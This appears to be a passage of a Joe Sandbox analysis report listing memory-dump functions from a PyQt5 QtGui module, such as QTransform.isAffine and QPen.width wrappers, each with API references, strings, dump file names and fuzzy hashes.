Function 00007FFD86240CF0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 30COMMON

Download Yara Rule

APIs

?isAffine@QTransform@@QEBA_NXZ.QT5GUI ref: 00007FFD86240D3B
PyBool_FromLong.PYTHON3 ref: 00007FFD86240D44

Strings

isAffine, xrefs: 00007FFD86240D62
QTransform, xrefs: 00007FFD86240D69
isAffine(self) -> bool, xrefs: 00007FFD86240D56

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Affine@Bool_FromLongTransform@@
String ID: QTransform$isAffine$isAffine(self) -> bool
API String ID: 26268445-1509544704
Opcode ID: a35e9d70b2f1a907f696fd9334d973df27cd66de4c005120f52805ef730feb14
Instruction ID: 6e331d038fe4bfae84858cf6cd7201536f9f490913cf8ddeeaaa49396de91f8c
Opcode Fuzzy Hash: a35e9d70b2f1a907f696fd9334d973df27cd66de4c005120f52805ef730feb14
Instruction Fuzzy Hash: AD012C75B08A46D1EB00AF54E8A86AD33A4FB54B60F954072CA5D47320DF7DE959C380

Function 00007FFD86268CF0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 30COMMON

Download Yara Rule

APIs

?startSystemMove@QWindow@@QEAA_NXZ.QT5GUI ref: 00007FFD86268D3B
PyBool_FromLong.PYTHON3 ref: 00007FFD86268D44

Strings

startSystemMove(self) -> bool, xrefs: 00007FFD86268D56
QWindow, xrefs: 00007FFD86268D69
startSystemMove, xrefs: 00007FFD86268D62

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?startBool_FromLongMove@SystemWindow@@
String ID: QWindow$startSystemMove$startSystemMove(self) -> bool
API String ID: 4180735198-3765074379
Opcode ID: d1b35e25bbd22669d550b225b0adaf7bd4c45efc80f583a24e8f7f10547eaddb
Instruction ID: da0c1fc089dbe2dff7197bb19555e41c62111d8fb29216b0e72328f9eacc6b5d
Opcode Fuzzy Hash: d1b35e25bbd22669d550b225b0adaf7bd4c45efc80f583a24e8f7f10547eaddb
Instruction Fuzzy Hash: 95012875B08A8AD1EB00EF64E8A86AC37A4FB44B64F950072CA5D07330DF7DD99AC740

Function 00007FFD8629AD40 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 30COMMON

Download Yara Rule

APIs

?elementCount@QPainterPath@@QEBAHXZ.QT5GUI ref: 00007FFD8629AD8B
PyLong_FromLong.PYTHON3 ref: 00007FFD8629AD93

Strings

propertyCount(self) -> int, xrefs: 00007FFD8629ADA5
propertyCount, xrefs: 00007FFD8629ADB1
QTextFormat, xrefs: 00007FFD8629ADB8

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?elementCount@FromLongLong_PainterPath@@
String ID: QTextFormat$propertyCount$propertyCount(self) -> int
API String ID: 3704173227-1679450377
Opcode ID: e6a1c69f4e626a2a834920ef70c6df637a91cd24d95792a21848e3f29d8e395d
Instruction ID: 6c68b91f634d23058a792579dbe0bb94c8fb6e41eef9eff95803231d5e5d8a5b
Opcode Fuzzy Hash: e6a1c69f4e626a2a834920ef70c6df637a91cd24d95792a21848e3f29d8e395d
Instruction Fuzzy Hash: CB012875B09B46C1EB00AF64E8AC6AD33A4FB84B64F950072CA4D43320DF7CD94AC380

Function 00007FFD8626AD30 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 30COMMON

Download Yara Rule

APIs

?isEmpty@QRegion@@QEBA_NXZ.QT5GUI ref: 00007FFD8626AD7B
PyBool_FromLong.PYTHON3 ref: 00007FFD8626AD84

Strings

QRegion, xrefs: 00007FFD8626ADA9
isNull, xrefs: 00007FFD8626ADA2
isNull(self) -> bool, xrefs: 00007FFD8626AD96

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Bool_Empty@FromLongRegion@@
String ID: QRegion$isNull$isNull(self) -> bool
API String ID: 2324610364-843883859
Opcode ID: b38f9180f3706f28f41f75b3206f763959cc889f344de3354b64c7bfa2edc4a9
Instruction ID: 98d74abb86e210ab20f7a9535e5f477d28ac7b742c96c824effef40929f7f5d9
Opcode Fuzzy Hash: b38f9180f3706f28f41f75b3206f763959cc889f344de3354b64c7bfa2edc4a9
Instruction Fuzzy Hash: 38012875B08A8AD1EB00AF65E8A86AD33A4FB44B65F954072CA5D43320DF7DDA59C380

Function 00007FFD862A2D60 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 30COMMON

Download Yara Rule

APIs

?lengthSquared@QQuaternion@@QEBAMXZ.QT5GUI ref: 00007FFD862A2DAB
PyFloat_FromDouble.PYTHON3 ref: 00007FFD862A2DB5

Strings

QQuaternion, xrefs: 00007FFD862A2DDA
lengthSquared, xrefs: 00007FFD862A2DD3
lengthSquared(self) -> float, xrefs: 00007FFD862A2DC7

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?lengthDoubleFloat_FromQuaternion@@Squared@
String ID: QQuaternion$lengthSquared$lengthSquared(self) -> float
API String ID: 904673410-3156567876
Opcode ID: 50cea244c4c1743c00ed6979229a4f1faa0c790c9f0d4ab97a44d3c447d729a4
Instruction ID: 35973c6aa71509a79b71e1da980937f254cf81e2d2749af6742cccd11ac76318
Opcode Fuzzy Hash: 50cea244c4c1743c00ed6979229a4f1faa0c790c9f0d4ab97a44d3c447d729a4
Instruction Fuzzy Hash: 5C011A71B08A4A91EB00AF65E8996AD33A4FF44BA5F954072CA4D43320DF7CD999C340

Function 00007FFD8629ADD0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 30COMMON

Download Yara Rule

APIs

?isSelectable@QStandardItem@@QEBA_NXZ.QT5GUI ref: 00007FFD8629AE1B
PyBool_FromLong.PYTHON3 ref: 00007FFD8629AE24

Strings

QStandardItem, xrefs: 00007FFD8629AE49
isSelectable, xrefs: 00007FFD8629AE42
isSelectable(self) -> bool, xrefs: 00007FFD8629AE36

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Bool_FromItem@@LongSelectable@Standard
String ID: QStandardItem$isSelectable$isSelectable(self) -> bool
API String ID: 3538831276-3284737215
Opcode ID: 1bb0d010888fceb9e39949aec58594d875b93129d034cfb94811dbfe6f13e98d
Instruction ID: d7d53cec4a0b436365fd18674547c5f31bdd35eb6cd3a806f0257d7b6cbab31d
Opcode Fuzzy Hash: 1bb0d010888fceb9e39949aec58594d875b93129d034cfb94811dbfe6f13e98d
Instruction Fuzzy Hash: CF012835F08A86C1EB00AF55E8A86AC37A4FB54BA5F950072CA5D03320DF7DDA59C780

Function 00007FFD86274DA0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 30COMMON

Download Yara Rule

APIs

?skipRows@QOpenGLPixelTransferOptions@@QEBAHXZ.QT5GUI ref: 00007FFD86274DEB
PyLong_FromLong.PYTHON3 ref: 00007FFD86274DF3

Strings

greenBufferSize, xrefs: 00007FFD86274E11
greenBufferSize(self) -> int, xrefs: 00007FFD86274E05
QSurfaceFormat, xrefs: 00007FFD86274E18

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?skipFromLongLong_OpenOptions@@PixelRows@Transfer
String ID: QSurfaceFormat$greenBufferSize$greenBufferSize(self) -> int
API String ID: 4172478235-1430066569
Opcode ID: 397d0c77c1ac9551085751c1fb3847908bfc788e69a81efed93c1e262b9cd024
Instruction ID: 3eda626e9db06a31adbd50ad1d675eeec22d10c40802a69dbca5e4d361efab16
Opcode Fuzzy Hash: 397d0c77c1ac9551085751c1fb3847908bfc788e69a81efed93c1e262b9cd024
Instruction Fuzzy Hash: A8012C75B08A86D2EB00DF64E86D6AD33A4FB44764F954072CA5D43324DF7CD959C380

Function 00007FFD8625EDA0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 30COMMON

Download Yara Rule

APIs

?doubleProperty@QTextFormat@@QEBANH@Z.QT5GUI ref: 00007FFD8625EDF0
PyFloat_FromDouble.PYTHON3 ref: 00007FFD8625EDF6

Strings

padding(self) -> float, xrefs: 00007FFD8625EE08
QTextFrameFormat, xrefs: 00007FFD8625EE1B
padding, xrefs: 00007FFD8625EE14

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?doubleDoubleFloat_Format@@FromProperty@Text
String ID: QTextFrameFormat$padding$padding(self) -> float
API String ID: 2584946227-3588083962
Opcode ID: 62dab15c3758232feceeb9d84cf8d5ec5e76e73f2cb265be52ae20e8a092c2d4
Instruction ID: 5c8a2fbbb7b433525e6de912f59e00da9ac53148e50ee6fa4a0422b2b1cc0ab9
Opcode Fuzzy Hash: 62dab15c3758232feceeb9d84cf8d5ec5e76e73f2cb265be52ae20e8a092c2d4
Instruction Fuzzy Hash: 5F012C75B08A4AD1EB00AF54E85D6AD37A4FB54B64F954072CA4D43320DF7DDE49C340

Function 00007FFD86256DA0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 30COMMON

Download Yara Rule

APIs

?columnNumber@QTextCursor@@QEBAHXZ.QT5GUI ref: 00007FFD86256DEB
PyLong_FromLong.PYTHON3 ref: 00007FFD86256DF3

Strings

columnNumber(self) -> int, xrefs: 00007FFD86256E05
QTextCursor, xrefs: 00007FFD86256E18
columnNumber, xrefs: 00007FFD86256E11

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?columnCursor@@FromLongLong_Number@Text
String ID: QTextCursor$columnNumber$columnNumber(self) -> int
API String ID: 4110913226-2880333139
Opcode ID: 2bc7b8f8cc62251645eda4bfb0256c8cb1356aefd680398a22623e78db3205a6
Instruction ID: feee32b749e564d06fc3146b8b8d077ddc5cc872552edbaeb6f2280c400a9a5f
Opcode Fuzzy Hash: 2bc7b8f8cc62251645eda4bfb0256c8cb1356aefd680398a22623e78db3205a6
Instruction Fuzzy Hash: EE011A75B08A46D1EB00AF65E8686AD33A4FB44BA4F950072CA5D43330DF7DE959C340

Function 00007FFD86260200 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 30COMMON

Download Yara Rule

APIs

?width@QPen@@QEBAHXZ.QT5GUI ref: 00007FFD8626024B
PyLong_FromLong.PYTHON3 ref: 00007FFD86260253

Strings

QPen, xrefs: 00007FFD86260278
width(self) -> int, xrefs: 00007FFD86260265
width, xrefs: 00007FFD86260271

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
